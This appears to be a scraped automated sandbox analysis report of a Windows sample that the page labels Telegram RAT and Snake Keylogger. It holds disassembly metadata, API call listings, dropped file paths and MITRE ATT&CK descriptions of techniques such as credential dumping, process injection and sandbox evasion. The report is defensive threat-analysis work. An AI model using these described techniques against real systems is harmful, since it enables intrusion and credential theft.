Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID: CharNext
String ID: Error writing temporary file. Make sure your temp folder is valid.
API String ID: 3213498283-4064111799
Opcode ID: f220efeea37ee359dd6515a544f61222e30bb784142ca8a223f370c395045e43
Instruction ID: 8ad88def47e2d38867cf9e91343d20e41dbac1805b4d4da5c0653217526e5d7e
Opcode Fuzzy Hash: f220efeea37ee359dd6515a544f61222e30bb784142ca8a223f370c395045e43
Instruction Fuzzy Hash: 2FF06261918F1D56EB317A584C55A7756B8EB96350B04843BD741B71C0D3BC48818EE9

Function 00405B37 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,004033A3,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004035E2), ref: 00405B3D
CharPrevW.USER32(?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,004033A3,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004035E2), ref: 00405B47
lstrcatW.KERNEL32(?,0040A014), ref: 00405B59

Strings

C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405B37

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user~1\AppData\Local\Temp\
API String ID: 2659869361-2382934351
Opcode ID: 69ce20dac70bd98cff0fbc611a97eee619d910519d07cd3d76554ab653056bec
Instruction ID: 377234fc647d40db67a969affeec1c2d2c00c7240f2da489af686c3f2ce23dc9
Opcode Fuzzy Hash: 69ce20dac70bd98cff0fbc611a97eee619d910519d07cd3d76554ab653056bec
Instruction Fuzzy Hash: E1D05E711019246AC1117B448D04DDB63ACAE45300341046EF202B70A6C778695286FD

Function 004038DA Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(000002A8,C:\Users\user~1\AppData\Local\Temp\,0040370C,?), ref: 004038EC
CloseHandle.KERNEL32(000002B8,C:\Users\user~1\AppData\Local\Temp\,0040370C,?), ref: 00403900

Strings

C:\Users\user~1\AppData\Local\Temp\nss7012.tmp, xrefs: 00403910
C:\Users\user~1\AppData\Local\Temp\, xrefs: 004038DF

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID: CloseHandle
String ID: C:\Users\user~1\AppData\Local\Temp\$C:\Users\user~1\AppData\Local\Temp\nss7012.tmp
API String ID: 2962429428-122503355
Opcode ID: 818760232e500ac014ecc4659e20c47a416318d98e4cd696d1546b419abd0e17
Instruction ID: de49926bb72e77a98f9c5ce19ed8b4a608a10c25b77e0dec4f49a46a5066bf07
Opcode Fuzzy Hash: 818760232e500ac014ecc4659e20c47a416318d98e4cd696d1546b419abd0e17
Instruction Fuzzy Hash: E2E086B140071896C5246F7CAD4D9953A185F453357244326F078F60F0C7789A675A99

Function 00405256 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00405285
CallWindowProcW.USER32(?,?,?,?), ref: 004052D6

Part of subcall function 00404293: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004042A5

Strings

, xrefs: 00405266

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 56cab98530d4ff4408cd9c369303e271687e5fa7c90705031ed2c8dc290fa65f
Instruction ID: e2cad66c9b02384d3be1b0302d87088ec840166322e374313d6fbb5223fafa3d
Opcode Fuzzy Hash: 56cab98530d4ff4408cd9c369303e271687e5fa7c90705031ed2c8dc290fa65f
Instruction Fuzzy Hash: 5D01B1B1210709AFEF208F51DD80A6B3B35EF85361F10813BFA00761D1C77A9C529E29

Function 00405B83 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402EAD,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\r5yYt97sfB.exe,C:\Users\user\Desktop\r5yYt97sfB.exe,80000000,00000003), ref: 00405B89
CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402EAD,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\r5yYt97sfB.exe,C:\Users\user\Desktop\r5yYt97sfB.exe,80000000,00000003), ref: 00405B99

Strings

C:\Users\user\Desktop, xrefs: 00405B83

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-3976562730
Opcode ID: 2f3bd6b78df313aedfed625dab12a62b748c0839e8540faa9dae91e8a46bacba
Instruction ID: 9a844447357a9703a2937c3aa74ac44ffd17116a21dd7a3b54c6405c44ad0d39
Opcode Fuzzy Hash: 2f3bd6b78df313aedfed625dab12a62b748c0839e8540faa9dae91e8a46bacba
Instruction Fuzzy Hash: 86D05EB2401D209AD3226B08DC01D9F73ACEF1130174A486AE441A61A5D7787D808AA8

Function 00405CBD Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F9E,00000000,[Rename],00000000,00000000,00000000), ref: 00405CCD
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405CE5
CharNextA.USER32(00000000,?,00000000,00405F9E,00000000,[Rename],00000000,00000000,00000000), ref: 00405CF6
lstrlenA.KERNEL32(00000000,?,00000000,00405F9E,00000000,[Rename],00000000,00000000,00000000), ref: 00405CFF

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: b8842b5e9385eef73c106f2d1b4b6860648d7e9ee05fc0ebd9cde526d115cc76
Instruction ID: b93a28ad29d67f10a2270253d02d4651c85e208682c2a56c3792b5f99d5f0f7a
Opcode Fuzzy Hash: b8842b5e9385eef73c106f2d1b4b6860648d7e9ee05fc0ebd9cde526d115cc76
Instruction Fuzzy Hash: 6FF0F631104958BFC7129FA5DD00A9FBBA8EF05350B2580BAE841F7220D674DE01AF68

Analysis Process: msiexec.exePID: 7864, Parent PID: 4236COMMON

Executed Functions

Function 02DCD044 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3797587264.0000000002DCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DCD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2dcd000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c3c3b6bf56fa7dae630ff4171d4a7553f4902d8bdb6815e711fb6ab2a1f1e20
Instruction ID: 5172133f84bed72e3d4ad26754eb6e29016ba358736ab7fce153e1e91ec17ad7
Opcode Fuzzy Hash: 6c3c3b6bf56fa7dae630ff4171d4a7553f4902d8bdb6815e711fb6ab2a1f1e20
Instruction Fuzzy Hash: CA21D071604205AFDB14DF24D9C4B26BBA2EB88324F30C57DE8894B342C736D847DA62

Function 02DCD03F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3797587264.0000000002DCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DCD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2dcd000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 042b7a53897df0d98a36b3ac5a7cbf217c0cc246f36523dbbdb550e319fcf960
Instruction ID: 51f04eca1c701c93b0c79bd8f39b90a59fef90b91ebdb53ba493ba4d3c87680a
Opcode Fuzzy Hash: 042b7a53897df0d98a36b3ac5a7cbf217c0cc246f36523dbbdb550e319fcf960
Instruction Fuzzy Hash: 71117C755042449FCB15CF14D9C4B15BBA2FB44324F34C6ADE8494B756C33AD84ADB52

Non-executed Functions

Function 02DFF974 Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3798478811.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2df0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a2461ea7d5838baaa254e63e9edfd4b24951f620b9ae7f678417188ea049390
Instruction ID: c883970e8443ed89e2ed4b7f2b1b3ed1deb480730cd034ed1bb66488ccb0a9b2
Opcode Fuzzy Hash: 6a2461ea7d5838baaa254e63e9edfd4b24951f620b9ae7f678417188ea049390
Instruction Fuzzy Hash: B7C1B274E01218CFEB54DFA5C994B9DBBB2BF88300F2080A9D509AB355DB359E81CF54

Function 02DFF2C0 Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3798478811.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2df0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e815f474f1aa3b80db78ae355cddf808553e9fd4904c2d675e9a1d188b240b4
Instruction ID: f09303214019aa1d891f8411e08dbe79c3fb2a25ec6d0ab5b4da5ca130da8187
Opcode Fuzzy Hash: 1e815f474f1aa3b80db78ae355cddf808553e9fd4904c2d675e9a1d188b240b4
Instruction Fuzzy Hash: B3511470D00209CFDB44EFA9C5887ADB7F2BB49304F158129C614AB794DB759C81CFA8

Function 02DFF4AC Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3798478811.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2df0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2e44dc3957d2c14c8c667a037999f2e96bfdf078b5f984e71bcceab151d15d6
Instruction ID: bd2507e94b50d252a03cb51cdc9377251f2ae948163006664e083d4c232f97bf
Opcode Fuzzy Hash: a2e44dc3957d2c14c8c667a037999f2e96bfdf078b5f984e71bcceab151d15d6
Instruction Fuzzy Hash: A9510F70D04209CFDB54EFA8D488BADBBB2FB48304F268119C655ABB94D7799C81CF58

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report r5yYt97sfB.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Telegram RAT

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_00urj3h5.aj1.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rnao4bzc.muv.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tossur1e.mmr.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y1t34orq.fuf.psm1

C:\Users\user\AppData\Local\Temp\nss6449.tmp

C:\Users\user\AppData\Local\Temp\nss7012.tmp\nsExec.dll

C:\Users\user\AppData\Local\magmaet\clenched\Dipterologist.Fra

C:\Users\user\AppData\Local\magmaet\clenched\Gruppekonto\Frontoparietal.ruf

C:\Users\user\AppData\Local\magmaet\clenched\Gruppekonto\aarsungens.bla

C:\Users\user\AppData\Local\magmaet\clenched\Gruppekonto\forsmgt.txt

